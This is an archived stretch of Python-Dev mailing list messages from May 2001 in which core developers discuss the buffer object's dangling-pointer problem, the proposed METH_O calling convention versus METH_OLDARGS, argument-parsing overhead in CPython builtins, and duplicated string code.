> [Tim]
> > The buffer object has been neglected for years:  is that because it's in
> > prime shape, or because nobody cares about it enough to maintain it?
> 
> My take is a little different.  I think people could be convinced to care
> about it, and indeed I do.  However, it has one fatal flaw, and no one seems
> to know what to do about it.
> 
> The problem is the one best demonstrated with the array module - if you get
> a pointer to the buffer interface for an array object, but the array then
> resizes itself, the buffer pointer dangles.

I guess there are three ways to "solve" this:

a) mutable types don't implement the getreadbuf interface

b) the getreadbuf interface is complemented with a callback
   interface, so the the buffer object can be notified of
   the change

c) calling getreadbuf on a mutable object causes this object
   to become immutable

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jeremy@digicool.com  Sun May 27 19:51:26 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:51:26 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
 <3B0E1E2C.4BC121B5@lemburg.com>
 <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
 <3B0ED0C7.F1A665EA@lemburg.com>
 <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
 <3B0F7D44.1A12CE0F@lemburg.com>
 <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <15121.19630.329909.482775@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin@loewis.home.cs.tu-berlin.de> writes:

  MvL> to the existing approach. The main point of this patch is to
  MvL> improve efficiency, and (according to Jeremy's analysis), most
  MvL> of the time for calling a function is spend in
  MvL> PyArg_ParseTuple.

I'd like to qualify this a bit.  What I reported earlier is that the
BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in
PyArg_ParseTuple().  This strikes me as excessive, because it's a
static property of the code.  (One could imagine writing a Python
script that parsed the "O!|is#" format strings and generated
efficient, specialized C code for that format.)

If we benchmark other programs, particularly those that do more work
in the builtins, the relative cost of the argument processing will be
lower.

Jeremy


From jeremy@digicool.com  Sun May 27 19:55:36 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:55:36 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
 <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
Message-ID: <15121.19880.775931.946049@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim.one@home.com> writes:

  TP> Do METH_O, convert every "O" function to use it, declare
  TP> victory, and enjoy the weekend <wink>.

  TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
  TP>     size-ly y'rs - tim

How is METH_O different than METH_OLDARGS?  

The old-style argument passing is definitely the most efficient for
functions of a zero or one arguments.  There's special-case code in
ceval to support it these cases -- fast_cfunction() -- primarily
because in these cases the function can be invoked by using arguments
directly from the Python stack instead of copying them to a tuple
first.

Jeremy


From tim.one@home.com  Sun May 27 21:37:43 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 16:37:43 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>

[Jeremy]
> How is METH_O different than METH_OLDARGS?

I have no idea:  can you explain it?  The #define's for these symbols are
uncommented, and it's a mystery to me what they're *supposed* to mean.

> The old-style argument passing is definitely the most efficient for
> functions of a zero or one arguments.  There's special-case code in
> ceval to support it these cases -- fast_cfunction() -- primarily
> because in these cases the function can be invoked by using arguments
> directly from the Python stack instead of copying them to a tuple
> first.

OK, I'm looking in bltinmodule.c, at builtin_len.  It starts like so:

static PyObject *
builtin_len(PyObject *self, PyObject *args)
{
	PyObject *v;
	long res;

	if (!PyArg_ParseTuple(args, "O:len", &v))
		return NULL;

So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
table is:

	{"len",		builtin_len, 1, len_doc},

That is, it says nothing about the calling convention.  Since C fills in a 0
for missing values, and methodobject.c has

/* Flag passed to newmethodobject */
#define METH_OLDARGS  0x0000
#define METH_VARARGS  0x0001
#define METH_KEYWORDS 0x0002

then doesn't the stuct for builtin_len implicitly specify METH_OLDARGS?  But
if that's true, and fast_cfunction() does not create a tuple in this case,
how is that builtin_len gets a tuple?

Something doesn't add up here.  Or does it?  There's no *reference* to
METH_OLDARGS anywhere in the code base other than its definition and its use
in method tables, so whatever code *keys* off it must be assuming a
hardcoded 0 value for it -- or indeed nothing keys off it at all.

I expect this line in ceval.c is doing the dirty assumption:

			    } else if (flags == 0) {

and should be testing against METH_OLDARGS instead.

But I see that builtin_len is falling into the METH_VARARGS case despite
that it wasn't declared that way and that it sure looks like METH_OLDARGS
(0) is the default.  Confusing!  Fix it <wink>.


From tim.one@home.com  Sun May 27 21:46:29 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 16:46:29 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>

[Tim, thrashing]
> ...
> So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
> table is:
>
> 	{"len",		builtin_len, 1, len_doc},
>
> That is, it says nothing about the calling convention.

Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define.  So
that explains that.

Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is there
some advantage to using METH_VARARGS in this case?  This gets back to what
these #defines are intended to *mean*, and I still haven't figured that out.


From mwh@python.net  Sun May 27 22:32:48 2001
From: mwh@python.net (Michael Hudson)
Date: Sun, 27 May 2001 22:32:48 +0100 (BST)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>
Message-ID: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>

On Sun, 27 May 2001, Tim Peters wrote:

> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

So you can't do

>>> len(1,2)
2

a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS
(ie. more consistent).  It seems the proposed METH_O is basically
METH_OLDARGS + the restriction that there is in fact only one argument, so
we save a tuple allocation over METH_VARARGS, but get argument count
checking over METH_OLDARGS.

Cheers,
M.


From tim.one@home.com  Sun May 27 23:49:38 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 18:49:38 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>

[Tim]
> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

[Michael Hudson]
> So you can't do
>
> >>> len(1,2)
> 2
>
> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

If I didn't know better, I'd suspect Python's internal calling conventions
at the start didn't perfectly anticipate all future developements.  Among
other things, looks like it's impossible for a METH_OLDARGS function to
distinguish between being called with more than one argument and being
called with a single tuple argument.

> My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS
> (ie. more consistent).

Yes, METH_OLDARGS does appear to, well, suck.

> It seems the proposed METH_O is basically METH_OLDARGS + the
> restriction that there is in fact only one argument, so we save
> a tuple allocation over METH_VARARGS,

Also, and more importantly, save the PyArg_ParseTuple call on the receiving
end.

> but get argument count checking over METH_OLDARGS.

Which is worth getting.  I'm back to where I started here:

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


PS:  But today I'll add another:  add at least one comment to the code --
this stuff is a bitch to reverse-engineer.


From thomas@xs4all.net  Sun May 27 23:50:58 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:50:58 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100
References: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com> <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <20010528005058.H690@xs4all.nl>

On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote:
> On Sun, 27 May 2001, Tim Peters wrote:

> > Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> > there some advantage to using METH_VARARGS in this case?

> So you can't do

> >>> len(1,2)
> 2

> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

And don't forget the method-specific errormessage by passing ':len' in the
format string. Of course, this can easily be (and probably should) done by
passing another argument to whatever parses arguments in METH_O, rather than
invoking string parsing magic every call.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas@xs4all.net  Sun May 27 23:58:30 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:58:30 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400
References: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain> <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>
Message-ID: <20010528005830.I690@xs4all.nl>

On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote:

> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
>     size-ly y'rs  - tim

And recycle a quote a day ;)

> PS:  But today I'll add another:  add at least one comment to the code --
> this stuff is a bitch to reverse-engineer.

But not just any comment, please! The Pine sourcecode is riddled with calls
to 'mm_critical(stream)', and each call I've seen so far is nicely commented
with the utterly useless comment '/* go critical */'.

I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe-
 -what-Pine-actually-tries-to-do-ly y'rs,

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From martin@loewis.home.cs.tu-berlin.de  Sun May 27 23:45:53 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 00:45:53 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from
 Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT))
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
 <3B0E1E2C.4BC121B5@lemburg.com>
 <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
 <3B0ED0C7.F1A665EA@lemburg.com>
 <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
 <3B0F7D44.1A12CE0F@lemburg.com>
 <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com>
Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de>

> I'd like to qualify this a bit.  What I reported earlier is that the
> BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in
> PyArg_ParseTuple().  This strikes me as excessive, because it's a
> static property of the code.  (One could imagine writing a Python
> script that parsed the "O!|is#" format strings and generated
> efficient, specialized C code for that format.)
> 
> If we benchmark other programs, particularly those that do more work
> in the builtins, the relative cost of the argument processing will be
> lower.

Certainly: If the work inside the function increases, the overhead of
calling it will be less visible. What the benchmark shows, however,
and what my patch addresses, is that the time for *calling* a function
is primarily spent in PyArg_ParseTuple (and not in, say, building
argument tuples, putting parameters on the stack, fetching function
addresses, building method objects, and so on).

Regards,
Martin


From tim.one@home.com  Mon May 28 00:17:27 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 19:17:27 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <20010528005058.H690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>

[Thomas Wouters]
> And don't forget the method-specific errormessage by passing ':len' in
> the format string. Of course, this can easily be (and probably should)
> done by passing another argument to whatever parses arguments in
> METH_O, rather than invoking string parsing magic every call.

Martin's patch automatically inserts the name of the function in the
TypeError it raises when a METH_O call doesn't get exactly one argument, or
gets a (one or more) keyword argument.

Stick to METH_O and it's a clear win, even in this respect:  there's no info
in an explicit ":len" he's not already deducing, and almost all instances of
"O:name" formats today are exactly the same this way:

if (!PyArg_ParseTuple(args, "O:abs", &v))
if (!PyArg_ParseTuple(args, "O:callable", &v))
if (!PyArg_ParseTuple(args, "O:id", &v))
if (!PyArg_ParseTuple(args, "O:hash", &v))
if (!PyArg_ParseTuple(args, "O:hex", &v))
if (!PyArg_ParseTuple(args, "O:float", &v))
if (!PyArg_ParseTuple(args, "O:len", &v))
if (!PyArg_ParseTuple(args, "O:list", &v))
else if (!PyArg_ParseTuple(args, "O:min/max", &v))
if (!PyArg_ParseTuple(args, "O:oct", &v))
if (!PyArg_ParseTuple(args, "O:ord", &obj))
if (!PyArg_ParseTuple(args, "O:reload", &v))
if (!PyArg_ParseTuple(args, "O:repr", &v))
if (!PyArg_ParseTuple(args, "O:str", &v))
if (!PyArg_ParseTuple(args, "O:tuple", &v))
if (!PyArg_ParseTuple(args, "O:type", &v))

Those are all the ones in bltinmodule.c, and nearly all of them are called
extremely frequently in *some* programs.  The only oddball is min/max, but
then it supports more than one call-list format and so isn't a METH_O
candidate anyway.  Indeed, Martin's patch gives a *better* message than we
get for some mistakes today:

>>> len(val=2)
Yraceback (most recent call last):
 File "<stdin>", line 1, in ?
TypeError: len() takes exactly 1 argument (0 given)
>>>

Martin's would say

    TypeError: len takes no keyword arguments

in this case.  He should add "()" after the function name.  He should also
throw away the half of the patch complicating and slowing METH_O to get some
theoretical speedup in other cases:  make the one-arg builtins fly just as
fast as humanly possible.


From greg@cosc.canterbury.ac.nz  Mon May 28 01:23:55 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:23:55 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz>

> However, it has one fatal flaw, and no one seems
> to know what to do about it.

I think it would be safe if:

1) it kept a reference to the underlying object, and

2) it re-fetched the pointer and length info each time it was
   needed, using the underlying object's buffer interface.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon May 28 01:28:41 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:28:41 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010525132752.B5402@lyra.org>
Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz>

Greg Stein <gstein@lyra.org>

> "badly" is overstating the problem. It caches a pointer when it shouldn't.
> This doesn't work well

But "doesn't work well" means "can crash the interpreter".
I don't think "badly" is an overstatement here...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one@home.com  Mon May 28 02:42:30 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 21:42:30 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B10D758.3741AC2F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMENEKEAA.tim.one@home.com>

[MAL]
> I guess there are three ways to "solve" this:
>
> a) mutable types don't implement the getreadbuf interface

Of the few types that implement it today, that would leave only strings
(8-bit and Unicode).  Too much machinery just for that.  Besides, I once
posted an example to c.l.py showing how to use regexps to search mmap'ed
files, so *that* must continue to work forever <wink>.

> b) the getreadbuf interface is complemented with a callback
>    interface, so the the buffer object can be notified of
>    the change

I like this best, although there's no bound on the number of buffers that
may need to be notified in case of change (i.e., the object would need to
maintain a list of buffers to be notified).

> c) calling getreadbuf on a mutable object causes this object
>    to become immutable

Even easier, core dump as soon as getreadbuf is called <wink>.

[Greg Ewing]
> I think it would be safe if:
>
> 1) it kept a reference to the underlying object, and

That much it already does.

> 2) it re-fetched the pointer and length info each time it was
>    needed, using the underlying object's buffer interface.

If after

    b = buffer(some_object)

b.__getitem__ needed to refetch the info between

    b[i]
and
    b[i+1]

I expect it would be so slow even Greg wouldn't want it anymore.


From tim.one@home.com  Mon May 28 02:52:18 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 27 May 2001 21:52:18 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0FD023.C4588919@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>

[Tim]
> About combining strop and buffers and strings, don't forget
> unicodeobject.c:  that's got oodles of basically duplicate code too.
> /F suggested dealing with the minor differences via maintaining one
> code file that gets compiled multiple times w/ appropriate #defines.

[MAL]
> Hmm, that only saves us a few kB in source, but certainly not
> in the object files.

That's not the point.  Manually duplicated code blocks always get out of
synch, as people fix bugs in, or enhance, one of them but don't even know
about the others.  /F brought this up after I pissed away a few hours trying
to repair one of these in all places, and he noted that strop.replace() and
string.replace() are woefully inefficient anyway.

> The better idea would be making the types subclass from a generic
> abstract string object -- I just don't know how this will be
> possible with Guido's type patches. We'll just have to wait,
> I guess.

Wait for what?  If it were possible, is the chance that you'd take time to
rework unicodeobject.c to "subclass from a generic abstract string object"
greater than 0?  The chance that I would is exactly 0.


From martin@loewis.home.cs.tu-berlin.de  Mon May 28 07:36:49 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 08:36:49 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>

> How is METH_O different than METH_OLDARGS? 

METH_O will raise an exception if the function is called with more
than one argument, without calling the function. METH_OLDARGS will
pass a tuple in this case.

I believe you cannot distinguish between a single tuple argument and
an invocation with multiple arguments in a METH_OLDARGS function, is
that true?

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Mon May 28 08:40:54 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 09:40:54 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>

When investigating calling conventions, I took a special look at
METH_OLDARGS occurrences. While most of them look reasonable,
file.writelines caught my attention. It has

	if (args == NULL || !PySequence_Check(args)) {
		PyErr_SetString(PyExc_TypeError,
			   "writelines() argument must be a sequence of strings");
		return NULL;
	}

Because it is a METH_OLDARGS method, you can do

f=open("/tmp/x","w")
f.writelines("foo\n","bar\n")

With my upcoming patches, I'd replace this with METH_O, making this
call illegal. Does anybody see a problem with that change in
semantics?

Regards,
Martin


From thomas@xs4all.net  Mon May 28 09:17:58 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 10:17:58 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200
References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <20010528101758.K690@xs4all.nl>

On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote:

> When investigating calling conventions, I took a special look at
> METH_OLDARGS occurrences. While most of them look reasonable,
> file.writelines caught my attention. It has

> 	if (args == NULL || !PySequence_Check(args)) {
> 		PyErr_SetString(PyExc_TypeError,
> 			   "writelines() argument must be a sequence of strings");
> 		return NULL;
> 	}

> Because it is a METH_OLDARGS method, you can do

> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")

> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Hell yeah. About the same problem as with the 'l.append("foo", "bar")'
problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in
2.0, by converting a PyList_Check into a PySequence_Check:

$ python1.5
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
Traceback (innermost last):
  File "<stdin>", line 1, in ?
TypeError: writelines() requires list of strings

$ python2.0
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
>>> 

I do think we'll have to allow for this for one more release, with warnings
and all. It's extremely unlikely that anyone is using this, but changing it
without warning will definately not benifit 2.x's image wrt. stability ;P

If bugfix-releases were allowed to generate additional warnings, I'd add a
warning to 2.1.1....

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Mon May 28 10:04:51 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:04:51 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>
Message-ID: <3B1214B3.9A4C295D@lemburg.com>

Tim Peters wrote:
> 
> [Tim]
> > About combining strop and buffers and strings, don't forget
> > unicodeobject.c:  that's got oodles of basically duplicate code too.
> > /F suggested dealing with the minor differences via maintaining one
> > code file that gets compiled multiple times w/ appropriate #defines.
> 
> [MAL]
> > Hmm, that only saves us a few kB in source, but certainly not
> > in the object files.
> 
> That's not the point.  Manually duplicated code blocks always get out of
> synch, as people fix bugs in, or enhance, one of them but don't even know
> about the others.  /F brought this up after I pissed away a few hours trying
> to repair one of these in all places, and he noted that strop.replace() and
> string.replace() are woefully inefficient anyway.

Ok, so what we'd need is a bunch of generic low-level string 
operations: one set for 8-bit and one for 16-bit code. 

Looking at unicodeobject.c it seems that the section "Helpers" would
be a good start, plus perhaps a few bits from the method implementations
refactored to form a low-level string template library.

Perhaps we should move this code into
a file stringhelpers.h which then gets included by stringobject.c
and unicodeobject.c with appropriate #defines set up for
8-bit strings and for Unicode.

> > The better idea would be making the types subclass from a generic
> > abstract string object -- I just don't know how this will be
> > possible with Guido's type patches. We'll just have to wait,
> > I guess.
> 
> Wait for what?  If it were possible, is the chance that you'd take time to
> rework unicodeobject.c to "subclass from a generic abstract string object"
> greater than 0?  The chance that I would is exactly 0.

Well, that's hard to say. It would certainly be low-priority;
same for the above refactoring.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Mon May 28 10:19:16 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:19:16 +0200
Subject: [Python-Dev] Special-casing "O"
References: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>
Message-ID: <3B121814.E5E9896A@lemburg.com>

Tim Peters wrote:
> 
> [Thomas Wouters]
> > And don't forget the method-specific errormessage by passing ':len' in
> > the format string. Of course, this can easily be (and probably should)
> > done by passing another argument to whatever parses arguments in
> > METH_O, rather than invoking string parsing magic every call.
> 
> Martin's patch automatically inserts the name of the function in the
> TypeError it raises when a METH_O call doesn't get exactly one argument, or
> gets a (one or more) keyword argument.
> 
> Stick to METH_O and it's a clear win, even in this respect:  there's no info
> in an explicit ":len" he's not already deducing, and almost all instances of
> "O:name" formats today are exactly the same this way:
> 
> if (!PyArg_ParseTuple(args, "O:abs", &v))
> if (!PyArg_ParseTuple(args, "O:callable", &v))
> if (!PyArg_ParseTuple(args, "O:id", &v))
> if (!PyArg_ParseTuple(args, "O:hash", &v))
> if (!PyArg_ParseTuple(args, "O:hex", &v))
> if (!PyArg_ParseTuple(args, "O:float", &v))
> if (!PyArg_ParseTuple(args, "O:len", &v))
> if (!PyArg_ParseTuple(args, "O:list", &v))
> else if (!PyArg_ParseTuple(args, "O:min/max", &v))
> if (!PyArg_ParseTuple(args, "O:oct", &v))
> if (!PyArg_ParseTuple(args, "O:ord", &obj))
> if (!PyArg_ParseTuple(args, "O:reload", &v))
> if (!PyArg_ParseTuple(args, "O:repr", &v))
> if (!PyArg_ParseTuple(args, "O:str", &v))
> if (!PyArg_ParseTuple(args, "O:tuple", &v))
> if (!PyArg_ParseTuple(args, "O:type", &v))
> 
> Those are all the ones in bltinmodule.c, and nearly all of them are called
> extremely frequently in *some* programs.  The only oddball is min/max, but
> then it supports more than one call-list format and so isn't a METH_O
> candidate anyway.  Indeed, Martin's patch gives a *better* message than we
> get for some mistakes today:
> 
> >>> len(val=2)
> Yraceback (most recent call last):
>  File "<stdin>", line 1, in ?
> TypeError: len() takes exactly 1 argument (0 given)
> >>>
> 
> Martin's would say
> 
>     TypeError: len takes no keyword arguments
> 
> in this case.  He should add "()" after the function name.  He should also
> throw away the half of the patch complicating and slowing METH_O to get some
> theoretical speedup in other cases:  make the one-arg builtins fly just as
> fast as humanly possible.

If we end up only optimizing the re.match("O+") case, we wouldn't need 
the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
and Martin could call the underlying API with one or more PyObject*
taken directly from the Python VM stack.

In that case, please consider at least supporting "O", "OO" and "OOO"
with optional arguments treated like I suggested in an earlier
posting (simply pass NULL and let the API take care of assigning
a default value).

This would take care of most builtins:

Python/bltinmodule.c:
--      if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq))
--      if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b))
--      if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt))
--      if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value))
--      if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z))
--      if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result))
--      if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls))
--      if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls))
--      if (!PyArg_ParseTuple(args, "O:abs", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict))
--      if (!PyArg_ParseTuple(args, "O:callable", &v))
--      if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i))
--      if (!PyArg_ParseTuple(args, "O:id", &v))
--      if (!PyArg_ParseTuple(args, "O:hash", &v))
--      if (!PyArg_ParseTuple(args, "O:hex", &v))
--      if (!PyArg_ParseTuple(args, "O:float", &v))
--      if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w))
--      if (!PyArg_ParseTuple(args, "O:len", &v))
--      if (!PyArg_ParseTuple(args, "O:list", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step))
--      else if (!PyArg_ParseTuple(args, "O:min/max", &v))
--      if (!PyArg_ParseTuple(args, "O:oct", &v))
--      if (!PyArg_ParseTuple(args, "O:ord", &obj))
--      if (!PyArg_ParseTuple(args, "O:reload", &v))
--      if (!PyArg_ParseTuple(args, "O:repr", &v))
--      if (!PyArg_ParseTuple(args, "O:str", &v))
--      if (!PyArg_ParseTuple(args, "O:tuple", &v))
--      if (!PyArg_ParseTuple(args, "O:type", &v))

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jeremy@digicool.com  Mon May 28 17:45:27 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Mon, 28 May 2001 12:45:27 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <15122.32935.53414.174221@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin@loewis.home.cs.tu-berlin.de> writes:

  >> How is METH_O different than METH_OLDARGS?

  MvL> METH_O will raise an exception if the function is called with
  MvL> more than one argument, without calling the
  MvL> function. METH_OLDARGS will pass a tuple in this case.

Yes, I see that now.  I'm +1 on METH_O, then.

Jeremy


From tim.one@home.com  Mon May 28 18:23:47 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 13:23:47 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEONKEAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I believe you cannot distinguish between a single tuple argument and
> an invocation with multiple arguments in a METH_OLDARGS function, is
> that true?

That's the conclusion I reached after staring at the code..


From fdrake@acm.org  Mon May 28 19:20:01 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:20:01 -0400 (EDT)
Subject: [Python-Dev] Removing doc/howto on python.org
